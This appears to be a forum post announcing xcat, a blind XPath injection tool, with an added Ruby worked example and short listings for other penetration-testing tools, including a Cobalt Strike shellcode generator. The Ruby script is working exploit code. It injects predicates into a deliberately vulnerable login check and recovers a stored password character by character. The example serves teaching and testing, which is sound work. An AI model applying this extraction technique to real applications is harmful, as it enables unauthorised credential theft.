      xcat v1.0.5 - exploit and investigate blind XPath injection

      By itsMe


      XCat is a command line tool to exploit and investigate blind XPath injection vulnerabilities.

      For a complete reference, read the documentation.

      It supports a large number of features:

          Auto-selects injections (run xcat injections for a list)

          Detects the version and capabilities of the XPath parser and selects the fastest method of retrieval

          Built in out-of-bound HTTP server
              Automates XXE attacks
              Can use OOB HTTP requests to drastically speed up retrieval

          Custom request headers and body

          Built in REPL shell, supporting:
              Reading arbitrary files
              Reading environment variables
              Listing directories
              Uploading/downloading files (soon TM)

          Optimized retrieval
              Uses binary search over Unicode codepoints if available
              Fallbacks include searching first for characters already retrieved
              Normalizes unicode to reduce the search space

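The retrieval strategy the feature list above describes, as an added worked example in Ruby (this is not xcat's code and not part of the post): the string length is found with numeric comparisons, each character is bisected over Unicode codepoints when the engine supports XPath 2.0, and otherwise a guess-the-character fallback tries characters already recovered before the rest of a fixed alphabet. The XML user store, the vulnerable_login? function and the BlindXPath class are constructed for illustration. Ruby's REXML is an XPath 1.0 engine, so in this run the capability probe fails and the 1.0 fallback is what actually executes.

```ruby
require 'rexml/document'

# Constructed sample data standing in for the target's XML backend.
USERS_XML = <<~XML
  <users>
    <user><name>admin</name><password>s3cr3t!</password></user>
    <user><name>bob</name><password>hunter2</password></user>
  </users>
XML
DOC = REXML::Document.new(USERS_XML)

# Hypothetical target: a login check that concatenates user input into the
# XPath query. It answers only "matched" / "not matched" and treats an XPath
# error as "not matched": the one-bit oracle a blind injection needs.
def vulnerable_login?(username)
  !REXML::XPath.first(DOC, "//user[name='#{username}']").nil?
rescue StandardError
  false
end

# Attacker side, fed by a block that submits one predicate to the target.
class BlindXPath
  # Alphabet for the XPath 1.0 fallback; the single quote is left out because
  # it would close the injected string literal.
  ALPHABET = [*'a'..'z', *'A'..'Z', *'0'..'9', *'!@#_-+=.,:;? '.chars].freeze

  attr_reader :requests

  def initialize(&oracle)
    @oracle = oracle
    @requests = 0
    @seen = Hash.new(0) # characters already recovered => how often
    @xpath2 = nil
  end

  def ask(predicate)
    @requests += 1
    @oracle.call(predicate)
  end

  # Capability probe: an XPath 2.0+ engine evaluates string-to-codepoints();
  # a 1.0 engine such as REXML fails, which the oracle reports as false.
  def xpath2?
    @xpath2 = ask("string-to-codepoints('a') = 97") if @xpath2.nil?
    @xpath2
  end

  # Numeric comparison works in every XPath version, so the length costs
  # O(log n) requests: exponential probing for an upper bound, then bisection.
  def length_of(expr)
    hi = 1
    hi *= 2 while ask("string-length(#{expr}) > #{hi}")
    lo = 0
    while lo < hi
      mid = (lo + hi) / 2
      if ask("string-length(#{expr}) > #{mid}")
        lo = mid + 1
      else
        hi = mid
      end
    end
    lo
  end

  # XPath 2.0+: bisect the codepoint, about 21 requests per character whatever
  # the alphabet. Not exercised against REXML (no string-to-codepoints()).
  def char_by_codepoint(expr, i)
    lo, hi = 0, 0x10FFFF
    while lo < hi
      mid = (lo + hi) / 2
      if ask("string-to-codepoints(substring(#{expr}, #{i}, 1)) > #{mid}")
        lo = mid + 1
      else
        hi = mid
      end
    end
    lo.chr(Encoding::UTF_8)
  end

  # XPath 1.0 fallback: equality tests against candidates, trying characters
  # already recovered (most frequent first) before the rest of the alphabet.
  def char_by_guessing(expr, i)
    ordered = @seen.keys.sort_by { |c| -@seen[c] } + (ALPHABET - @seen.keys)
    ordered.each do |c|
      next unless ask("substring(#{expr}, #{i}, 1) = '#{c}'")
      @seen[c] += 1
      return c
    end
    raise "character #{i} of #{expr} is not in ALPHABET"
  end

  def extract(expr)
    (1..length_of(expr)).map do |i|
      xpath2? ? char_by_codepoint(expr, i) : char_by_guessing(expr, i)
    end.join
  end
end

# The injection itself: close the literal, append the predicate, re-open it.
# "password" resolves relative to the matched <user>; any XPath expression,
# e.g. an absolute path to another node, can take its place.
def dump_admin_password
  attacker = BlindXPath.new { |pred| vulnerable_login?("admin' and #{pred} and 'x'='x") }
  [attacker.extract('password'), attacker.requests]
end

if $PROGRAM_NAME == __FILE__
  password, n = dump_admin_password
  puts "recovered #{password.inspect} in #{n} requests"
end
```

The request counter makes the cost of each strategy visible: with the 1.0 fallback, every character costs up to the size of the alphabet, which is why the codepoint bisection (a fixed ~21 requests per character) and the out-of-band channel matter when the target's parser supports them.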

      • Similar Content

        • By itsMe

          PeNCrawLer: An Advanced Web Crawler and DirBuster
          PeNCrawLer is an advanced web crawler and dirbuster designed for use in penetration testing on Windows.
        • By itsMe

          Juumla is a Python tool developed to identify the current Joomla version and scan for readable Joomla config files.
          Features
              Fast scan
              Low RAM and CPU usage
              Identify Joomla version
              Config files detection
              Open-Source
        • By itsMe

          Beaconator
          Beaconator is an aggressor script for Cobalt Strike used to generate raw stageless shellcode and pack it using PEzor.
          Changelog v1.1
              Fixed error check with the use of x86 arch & syscalls
              Fixed the “null value error” due to missing output folder
              Fixed issue with options persisting to subsequent payload generations
              Added PEzor’s BOF format
              Added the -cleanup option for BOFs
              Added the -sleep option
              Added more error checks
              Cleaned up the code
        • By itsMe

          HawkScan
          Security tool for reconnaissance and information gathering on a website (Python 2.x & 3.x).
          This script uses “WafW00f” to detect the WAF in the first step.
          This script uses “Sublist3r” to scan subdomains.
          This script uses “waybacktool” to check the Wayback Machine.

          Features
              URL fuzzing and dir/file detection
              Test backup/old files on all the files found (index.php.bak, index.php~ …)
              Check header information
              Check DNS information
              Check whois information
              Random or custom User-Agent
              Extract files
              Keep a trace of the scan
              Check e-mail addresses on the website and check whether they have leaked
              CMS detection + version and vulns
              Subdomain checker
              Backup system (if the script is stopped, it resumes from the same place)
              WAF detection
              Add a custom prefix
              Auto-update script
              Automatic or custom output of the scan (scan.txt)
              Check GitHub
              Recursive dir/file
              Scan with an authentication cookie
              Option --profil to pass the profile page during the scan
              HTML report
              Works with py2 and py3
              Rate-limit option if the app is unstable (--timesleep)
              Check in the Wayback Machine
              Response error to WAF
              Check whether a firebaseio database exists and is accessible
              Automatic threads depending on the website's responses (reconfigured if the WAF is detected too many times). Max: 30
              Search for S3 buckets in page source code
              Test WAF bypass if one is detected
              Test whether scanning with “localhost” as the Host is possible
          Changelog v1.8.6
              Fixed: various bugs: thread modification, header parameters, bypass forbidden and others
              Added: google module in requirements/setup
              Updated: deleted the degoogle modules/script; google dork now works with the “googlesearch” module
              Updated: small style modification
              Updated: default thread count now 30
        • By itsMe

          This is a universal Reddit scraper that can scrape Subreddits, Redditors, and comments on posts.
          Scrape speed is determined by the speed of your internet connection.
          Changelog v3.3.2
              Added
                  Source code
                      In Redditor.py:
                          Added a new method GetInteractions._get_user_subreddit() – extracts subreddit data from the UserSubreddit object into a dictionary.
                  Tests
                      In test_Redditor.py:
                          Added TestGetUserSubredditMethod().test_get_user_subreddit() to test the new method.
              Changed
                  Source code
                      In Redditor.py:
                          GetInteractions._get_user_info() calls the new GetInteractions._get_user_subreddit() method to set the Redditor’s subreddit data within the main Redditor information dictionary.
                      In Version.py:
                          Incremented version number.
                  README
                      Incremented PRAW badge version number.